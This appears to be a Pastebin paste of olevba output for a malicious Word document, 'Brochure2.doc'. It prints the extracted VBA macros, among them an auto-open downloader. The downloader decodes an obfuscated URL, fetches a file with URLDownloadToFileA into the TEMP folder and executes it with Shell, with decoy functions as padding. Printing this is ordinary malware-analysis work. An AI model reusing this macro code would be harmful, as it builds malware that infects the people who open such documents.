Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.25 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS---- Brochure2.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: Brochure2.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: Brochure2.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub autoopen()
- eE5Ueh5
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +----------+----------+---------------------------------------+
- | Type | Keyword | Description |
- +----------+----------+---------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- +----------+----------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class1.cls
- in file: Brochure2.doc - OLE stream: u'Macros/VBA/Class1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Function PvEED()
- End Function
- Public Function tYlkADG()
- End Function
- Private Sub fOxzTwB()
- End Sub
- Private Function HvhIfeFnE()
- End Function
- Private Function uGASPmHgZUgxMi()
- End Function
- Public Sub xbdIdjqgLUV()
- End Sub
- Public Function CJoBAQTQO()
- End Function
- Private Sub gNPkMRfcK()
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO ÀÀâûàûâà.bas
- in file: Brochure2.doc - OLE stream: u'Macros/VBA/\u0410\u0410\u0432\u044b\u0430\u044b\u0432\u0430'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- #If VBA7 Then
- Private Declare PtrSafe Function dfsdfsdfsdf Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal BHGBkjsdfF As LongPtr, _
- ByVal sdfsdFFdsf As String, _
- ByVal sdfsdFFdsff As String, _
- ByVal sdfsdFFdsffd As Long, _
- ByVal sdfsdFFdsffds As LongPtr) As LongPtr
- #Else
- Private Declare Function dfsdfsdfsdf Lib "urlmon" Alias _
- "URLDownloadToFileA" (ByVal BHGBkjsdfF As Long, _
- ByVal sdfsdFFdsf As String, _
- ByVal sdfsdFFdsff As String, _
- ByVal sdfsdFFdsffd As Long, _
- ByVal sdfsdFFdsffds As Long) As Long
- #End If
- Function E1MwLaU707(BcbMtG1 As String, o04C As String) As Boolean
- vJHKBJdfkgfg = dfsdfsdfsdf(0&, BcbMtG1, o04C, 0&, 0&)
- fTb_A = Shell(o04C, 1)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------------+-----------------------------------------+
- | Suspicious | Lib | May run code from a DLL |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- | Suspicious | URLDownloadToFileA | May download files from the Internet |
- +------------+--------------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Class2.cls
- in file: Brochure2.doc - OLE stream: u'Macros/VBA/Class2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Private Sub xMiUfC()
- End Sub
- Private Sub Idjqg()
- End Sub
- Public Sub TZwCJoBAQTQOoCv()
- End Sub
- Public Sub kMRfcKYxxZhuV()
- End Sub
- Public Function KlLQQjRpY()
- End Function
- Private Sub wNdkmvS()
- End Sub
- Public Sub agzHwcYYQ()
- End Sub
- Public Sub arRQhQaRqTyweS()
- End Sub
- Private Sub isbbNNpyKmGlJc()
- End Sub
- Private Sub SliFpzFBNefACLj()
- End Sub
- Private Function qwPYMsoonsdV()
- End Function
- Private Sub TknqiGOyujDuk()
- End Sub
- Private Sub reQsObpQ()
- End Sub
- Private Function EspjBy()
- End Function
- Private Function VRehvQScmhKasM()
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: Brochure2.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function VQuwdjCKzfbbafP(nqtlJnRBxmGxoBL As String) As String
- For uiTvResardhH = 1 To Len(nqtlJnRBxmGxoBL) Step 2
- VQuwdjCKzfbbafP = VQuwdjCKzfbbafP & Mid(nqtlJnRBxmGxoBL, uiTvResardhH, 1)
- Next
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: Brochure2.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module4.bas
- in file: Brochure2.doc - OLE stream: u'Macros/VBA/Module4'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Sub YjplwNdk()
- End Sub
- Public Function NrtagzHwcYYQbM()
- End Function
- Private Sub RQhQaRqT()
- End Sub
- Public Function SndTi()
- End Function
- Private Sub NNpyK()
- End Sub
- Private Sub JcncZSl()
- End Sub
- Public Function zFBNefAC()
- End Function
- Private Function tJqwPYMsoonsdV()
- End Function
- Private Sub TknqiG()
- End Sub
- Public Sub ujDukyIrre()
- End Sub
- Private Function bpQoaeEspjByV()
- End Function
- Private Function RehvQScmhKasMga()
- End Function
- Private Function EDItmtYlkAD()
- End Function
- Private Function mfOxzTwBOZuHvhI()
- End Function
- Sub eE5Ueh5()
- E1MwLaU707 VQuwdjCKzfbbafP("ht@tPp<:y/o/pdmawtZag.ug1mdscl‚lnpt.dc0ogm?/;j|sf/)b{iin„.4evxve]"), Environ(VQuwdjCKzfbbafP("TPMnPI")) & VQuwdjCKzfbbafP("\U3z2%4u2N3E5F2C3L5/.†e0xje:")
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+---------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+---------------------------------------+
- | Suspicious | Environ | May read system environment variables |
- +------------+---------+---------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO UserForm1.frm
- in file: Brochure2.doc - OLE stream: u'Macros/VBA/UserForm1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement